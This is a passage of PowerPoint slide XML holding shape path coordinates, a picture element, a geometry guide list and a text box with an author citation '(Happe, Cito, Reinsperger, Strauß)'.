                    <a:pt x="0" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52059" y="635588"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3936902" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="67265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936902" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1221438" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1475304" y="67265"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1593431" y="67265"/>
                    <a:pt x="1673403" y="91441"/>
                    <a:pt x="1736636" y="147236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1804540" y="206761"/>
                    <a:pt x="1839860" y="293249"/>
                    <a:pt x="1839860" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1839860" y="431821"/>
                    <a:pt x="1837085" y="461600"/>
                    <a:pt x="1831511" y="489482"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811977" y="580610"/>
                    <a:pt x="1763607" y="649456"/>
                    <a:pt x="1686412" y="692212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1631559" y="722902"/>
                    <a:pt x="1564597" y="736863"/>
                    <a:pt x="1475304" y="736863"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="750838" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="832594" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832594" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="99437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="140311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597510" y="669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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70199DD9-998B-0C2B-C2B6-C62443239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7474" y="292050"/>
            <a:ext cx="3897052" cy="3897052"/>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02F55397-B11B-9ED7-401E-686F536BECF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290292" y="5669046"/>
            <a:ext cx="9901100" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Happe, Cito, Reinsperger, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strauß</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4185629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9C073CC6-D6B6-C28E-E464-FE7BD9ECD42F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838708" y="692696"/>
            <a:ext cx="5221288" cy="5508625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY0" fmla="*/ 26793701 h 26946982"/>
              <a:gd name="connsiteX1" fmla="*/ 153283 w 23952872"/>
              <a:gd name="connsiteY1" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX2" fmla="*/ 33255 w 23952872"/>
              <a:gd name="connsiteY2" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX3" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY3" fmla="*/ 26913728 h 26946982"/>
              <a:gd name="connsiteX4" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY4" fmla="*/ 26546677 h 26946982"/>
              <a:gd name="connsiteX5" fmla="*/ 400306 w 23952872"/>
              <a:gd name="connsiteY5" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX6" fmla="*/ 280280 w 23952872"/>
              <a:gd name="connsiteY6" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX7" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY7" fmla="*/ 26666704 h 26946982"/>
              <a:gd name="connsiteX8" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY8" fmla="*/ 26299654 h 26946982"/>
              <a:gd name="connsiteX9" fmla="*/ 647330 w 23952872"/>
              <a:gd name="connsiteY9" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX10" fmla="*/ 527302 w 23952872"/>
              <a:gd name="connsiteY10" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX11" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY11" fmla="*/ 26419681 h 26946982"/>
              <a:gd name="connsiteX12" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY12" fmla="*/ 26052627 h 26946982"/>
              <a:gd name="connsiteX13" fmla="*/ 894353 w 23952872"/>
              <a:gd name="connsiteY13" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX14" fmla="*/ 774326 w 23952872"/>
              <a:gd name="connsiteY14" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX15" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY15" fmla="*/ 26172654 h 26946982"/>
              <a:gd name="connsiteX16" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY16" fmla="*/ 25805604 h 26946982"/>
              <a:gd name="connsiteX17" fmla="*/ 1141377 w 23952872"/>
              <a:gd name="connsiteY17" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX18" fmla="*/ 1021350 w 23952872"/>
              <a:gd name="connsiteY18" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX19" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY19" fmla="*/ 25925631 h 26946982"/>
              <a:gd name="connsiteX20" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY20" fmla="*/ 25558583 h 26946982"/>
              <a:gd name="connsiteX21" fmla="*/ 1388400 w 23952872"/>
              <a:gd name="connsiteY21" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX22" fmla="*/ 1268373 w 23952872"/>
              <a:gd name="connsiteY22" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX23" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY23" fmla="*/ 25678610 h 26946982"/>
              <a:gd name="connsiteX24" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY24" fmla="*/ 25311557 h 26946982"/>
              <a:gd name="connsiteX25" fmla="*/ 1635424 w 23952872"/>
              <a:gd name="connsiteY25" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX26" fmla="*/ 1515397 w 23952872"/>
              <a:gd name="connsiteY26" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX27" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY27" fmla="*/ 25431587 h 26946982"/>
              <a:gd name="connsiteX28" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY28" fmla="*/ 25064536 h 26946982"/>
              <a:gd name="connsiteX29" fmla="*/ 1882447 w 23952872"/>
              <a:gd name="connsiteY29" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX30" fmla="*/ 1762420 w 23952872"/>
              <a:gd name="connsiteY30" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX31" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY31" fmla="*/ 25184563 h 26946982"/>
              <a:gd name="connsiteX32" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY32" fmla="*/ 24817512 h 26946982"/>
              <a:gd name="connsiteX33" fmla="*/ 2129470 w 23952872"/>
              <a:gd name="connsiteY33" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX34" fmla="*/ 2009444 w 23952872"/>
              <a:gd name="connsiteY34" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX35" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY35" fmla="*/ 24937540 h 26946982"/>
              <a:gd name="connsiteX36" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY36" fmla="*/ 24570489 h 26946982"/>
              <a:gd name="connsiteX37" fmla="*/ 2376494 w 23952872"/>
              <a:gd name="connsiteY37" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX38" fmla="*/ 2256467 w 23952872"/>
              <a:gd name="connsiteY38" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX39" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY39" fmla="*/ 24690516 h 26946982"/>
              <a:gd name="connsiteX40" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY40" fmla="*/ 24323464 h 26946982"/>
              <a:gd name="connsiteX41" fmla="*/ 2623518 w 23952872"/>
              <a:gd name="connsiteY41" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX42" fmla="*/ 2503491 w 23952872"/>
              <a:gd name="connsiteY42" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX43" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY43" fmla="*/ 24443493 h 26946982"/>
              <a:gd name="connsiteX44" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY44" fmla="*/ 24076441 h 26946982"/>
              <a:gd name="connsiteX45" fmla="*/ 2870541 w 23952872"/>
              <a:gd name="connsiteY45" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX46" fmla="*/ 2750514 w 23952872"/>
              <a:gd name="connsiteY46" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX47" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY47" fmla="*/ 24196469 h 26946982"/>
              <a:gd name="connsiteX48" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY48" fmla="*/ 23829417 h 26946982"/>
              <a:gd name="connsiteX49" fmla="*/ 3117565 w 23952872"/>
              <a:gd name="connsiteY49" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX50" fmla="*/ 2997537 w 23952872"/>
              <a:gd name="connsiteY50" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX51" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY51" fmla="*/ 23949446 h 26946982"/>
              <a:gd name="connsiteX52" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY52" fmla="*/ 23582391 h 26946982"/>
              <a:gd name="connsiteX53" fmla="*/ 3364588 w 23952872"/>
              <a:gd name="connsiteY53" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX54" fmla="*/ 3244561 w 23952872"/>
              <a:gd name="connsiteY54" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX55" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY55" fmla="*/ 23702419 h 26946982"/>
              <a:gd name="connsiteX56" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY56" fmla="*/ 23335371 h 26946982"/>
              <a:gd name="connsiteX57" fmla="*/ 3611612 w 23952872"/>
              <a:gd name="connsiteY57" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX58" fmla="*/ 3491585 w 23952872"/>
              <a:gd name="connsiteY58" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX59" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY59" fmla="*/ 23455398 h 26946982"/>
              <a:gd name="connsiteX60" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY60" fmla="*/ 23088347 h 26946982"/>
              <a:gd name="connsiteX61" fmla="*/ 3858635 w 23952872"/>
              <a:gd name="connsiteY61" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX62" fmla="*/ 3738608 w 23952872"/>
              <a:gd name="connsiteY62" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX63" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY63" fmla="*/ 23208372 h 26946982"/>
              <a:gd name="connsiteX64" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY64" fmla="*/ 22841321 h 26946982"/>
              <a:gd name="connsiteX65" fmla="*/ 4105659 w 23952872"/>
              <a:gd name="connsiteY65" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX66" fmla="*/ 3985632 w 23952872"/>
              <a:gd name="connsiteY66" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX67" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY67" fmla="*/ 22961351 h 26946982"/>
              <a:gd name="connsiteX68" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY68" fmla="*/ 22594297 h 26946982"/>
              <a:gd name="connsiteX69" fmla="*/ 4352682 w 23952872"/>
              <a:gd name="connsiteY69" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX70" fmla="*/ 4232655 w 23952872"/>
              <a:gd name="connsiteY70" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX71" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY71" fmla="*/ 22714327 h 26946982"/>
              <a:gd name="connsiteX72" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY72" fmla="*/ 22347277 h 26946982"/>
              <a:gd name="connsiteX73" fmla="*/ 4599706 w 23952872"/>
              <a:gd name="connsiteY73" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX74" fmla="*/ 4479679 w 23952872"/>
              <a:gd name="connsiteY74" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX75" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY75" fmla="*/ 22467304 h 26946982"/>
              <a:gd name="connsiteX76" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY76" fmla="*/ 22100253 h 26946982"/>
              <a:gd name="connsiteX77" fmla="*/ 4846730 w 23952872"/>
              <a:gd name="connsiteY77" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX78" fmla="*/ 4726702 w 23952872"/>
              <a:gd name="connsiteY78" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX79" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY79" fmla="*/ 22220280 h 26946982"/>
              <a:gd name="connsiteX80" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY80" fmla="*/ 21853230 h 26946982"/>
              <a:gd name="connsiteX81" fmla="*/ 5093753 w 23952872"/>
              <a:gd name="connsiteY81" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX82" fmla="*/ 4973726 w 23952872"/>
              <a:gd name="connsiteY82" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX83" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY83" fmla="*/ 21973257 h 26946982"/>
              <a:gd name="connsiteX84" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY84" fmla="*/ 21606206 h 26946982"/>
              <a:gd name="connsiteX85" fmla="*/ 5340776 w 23952872"/>
              <a:gd name="connsiteY85" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX86" fmla="*/ 5220749 w 23952872"/>
              <a:gd name="connsiteY86" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX87" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY87" fmla="*/ 21726233 h 26946982"/>
              <a:gd name="connsiteX88" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY88" fmla="*/ 21359182 h 26946982"/>
              <a:gd name="connsiteX89" fmla="*/ 5587800 w 23952872"/>
              <a:gd name="connsiteY89" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX90" fmla="*/ 5467773 w 23952872"/>
              <a:gd name="connsiteY90" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX91" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY91" fmla="*/ 21479210 h 26946982"/>
              <a:gd name="connsiteX92" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY92" fmla="*/ 21112156 h 26946982"/>
              <a:gd name="connsiteX93" fmla="*/ 5834823 w 23952872"/>
              <a:gd name="connsiteY93" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX94" fmla="*/ 5714796 w 23952872"/>
              <a:gd name="connsiteY94" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX95" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY95" fmla="*/ 21232186 h 26946982"/>
              <a:gd name="connsiteX96" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY96" fmla="*/ 20865132 h 26946982"/>
              <a:gd name="connsiteX97" fmla="*/ 6081847 w 23952872"/>
              <a:gd name="connsiteY97" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX98" fmla="*/ 5961820 w 23952872"/>
              <a:gd name="connsiteY98" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX99" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY99" fmla="*/ 20985163 h 26946982"/>
              <a:gd name="connsiteX100" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY100" fmla="*/ 20618111 h 26946982"/>
              <a:gd name="connsiteX101" fmla="*/ 6328871 w 23952872"/>
              <a:gd name="connsiteY101" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX102" fmla="*/ 6208843 w 23952872"/>
              <a:gd name="connsiteY102" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX103" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY103" fmla="*/ 20738136 h 26946982"/>
              <a:gd name="connsiteX104" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY104" fmla="*/ 20371085 h 26946982"/>
              <a:gd name="connsiteX105" fmla="*/ 6575894 w 23952872"/>
              <a:gd name="connsiteY105" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX106" fmla="*/ 6455867 w 23952872"/>
              <a:gd name="connsiteY106" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX107" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY107" fmla="*/ 20491113 h 26946982"/>
              <a:gd name="connsiteX108" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY108" fmla="*/ 20124064 h 26946982"/>
              <a:gd name="connsiteX109" fmla="*/ 6822917 w 23952872"/>
              <a:gd name="connsiteY109" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX110" fmla="*/ 6702890 w 23952872"/>
              <a:gd name="connsiteY110" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX111" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY111" fmla="*/ 20244092 h 26946982"/>
              <a:gd name="connsiteX112" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY112" fmla="*/ 19877044 h 26946982"/>
              <a:gd name="connsiteX113" fmla="*/ 7069941 w 23952872"/>
              <a:gd name="connsiteY113" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX114" fmla="*/ 6949914 w 23952872"/>
              <a:gd name="connsiteY114" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX115" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY115" fmla="*/ 19997066 h 26946982"/>
              <a:gd name="connsiteX116" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY116" fmla="*/ 19630020 h 26946982"/>
              <a:gd name="connsiteX117" fmla="*/ 7316966 w 23952872"/>
              <a:gd name="connsiteY117" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX118" fmla="*/ 7196937 w 23952872"/>
              <a:gd name="connsiteY118" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX119" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY119" fmla="*/ 19750045 h 26946982"/>
              <a:gd name="connsiteX120" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY120" fmla="*/ 19382994 h 26946982"/>
              <a:gd name="connsiteX121" fmla="*/ 7563990 w 23952872"/>
              <a:gd name="connsiteY121" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX122" fmla="*/ 7443961 w 23952872"/>
              <a:gd name="connsiteY122" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX123" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY123" fmla="*/ 19503024 h 26946982"/>
              <a:gd name="connsiteX124" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY124" fmla="*/ 19135973 h 26946982"/>
              <a:gd name="connsiteX125" fmla="*/ 7811013 w 23952872"/>
              <a:gd name="connsiteY125" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX126" fmla="*/ 7690984 w 23952872"/>
              <a:gd name="connsiteY126" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX127" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY127" fmla="*/ 19256000 h 26946982"/>
              <a:gd name="connsiteX128" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY128" fmla="*/ 18888947 h 26946982"/>
              <a:gd name="connsiteX129" fmla="*/ 8058036 w 23952872"/>
              <a:gd name="connsiteY129" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX130" fmla="*/ 7938008 w 23952872"/>
              <a:gd name="connsiteY130" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX131" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY131" fmla="*/ 19008974 h 26946982"/>
              <a:gd name="connsiteX132" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY132" fmla="*/ 18641923 h 26946982"/>
              <a:gd name="connsiteX133" fmla="*/ 8305060 w 23952872"/>
              <a:gd name="connsiteY133" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX134" fmla="*/ 8185032 w 23952872"/>
              <a:gd name="connsiteY134" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX135" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY135" fmla="*/ 18761950 h 26946982"/>
              <a:gd name="connsiteX136" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY136" fmla="*/ 18394900 h 26946982"/>
              <a:gd name="connsiteX137" fmla="*/ 8552084 w 23952872"/>
              <a:gd name="connsiteY137" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX138" fmla="*/ 8432055 w 23952872"/>
              <a:gd name="connsiteY138" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX139" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY139" fmla="*/ 18514927 h 26946982"/>
              <a:gd name="connsiteX140" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY140" fmla="*/ 18147874 h 26946982"/>
              <a:gd name="connsiteX141" fmla="*/ 8799107 w 23952872"/>
              <a:gd name="connsiteY141" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX142" fmla="*/ 8679078 w 23952872"/>
              <a:gd name="connsiteY142" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX143" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY143" fmla="*/ 18267904 h 26946982"/>
              <a:gd name="connsiteX144" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY144" fmla="*/ 17900853 h 26946982"/>
              <a:gd name="connsiteX145" fmla="*/ 9046131 w 23952872"/>
              <a:gd name="connsiteY145" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX146" fmla="*/ 8926102 w 23952872"/>
              <a:gd name="connsiteY146" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX147" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY147" fmla="*/ 18020883 h 26946982"/>
              <a:gd name="connsiteX148" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY148" fmla="*/ 17653827 h 26946982"/>
              <a:gd name="connsiteX149" fmla="*/ 9293154 w 23952872"/>
              <a:gd name="connsiteY149" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX150" fmla="*/ 9173126 w 23952872"/>
              <a:gd name="connsiteY150" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX151" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY151" fmla="*/ 17773854 h 26946982"/>
              <a:gd name="connsiteX152" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY152" fmla="*/ 17406809 h 26946982"/>
              <a:gd name="connsiteX153" fmla="*/ 9540178 w 23952872"/>
              <a:gd name="connsiteY153" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX154" fmla="*/ 9420151 w 23952872"/>
              <a:gd name="connsiteY154" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX155" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY155" fmla="*/ 17526833 h 26946982"/>
              <a:gd name="connsiteX156" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY156" fmla="*/ 17159782 h 26946982"/>
              <a:gd name="connsiteX157" fmla="*/ 9787201 w 23952872"/>
              <a:gd name="connsiteY157" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX158" fmla="*/ 9667174 w 23952872"/>
              <a:gd name="connsiteY158" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX159" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY159" fmla="*/ 17279812 h 26946982"/>
              <a:gd name="connsiteX160" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY160" fmla="*/ 16912762 h 26946982"/>
              <a:gd name="connsiteX161" fmla="*/ 10034225 w 23952872"/>
              <a:gd name="connsiteY161" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX162" fmla="*/ 9914198 w 23952872"/>
              <a:gd name="connsiteY162" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX163" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY163" fmla="*/ 17032789 h 26946982"/>
              <a:gd name="connsiteX164" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY164" fmla="*/ 16665738 h 26946982"/>
              <a:gd name="connsiteX165" fmla="*/ 10281248 w 23952872"/>
              <a:gd name="connsiteY165" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX166" fmla="*/ 10161221 w 23952872"/>
              <a:gd name="connsiteY166" fmla="*/ 26946978 h 26946982"/>
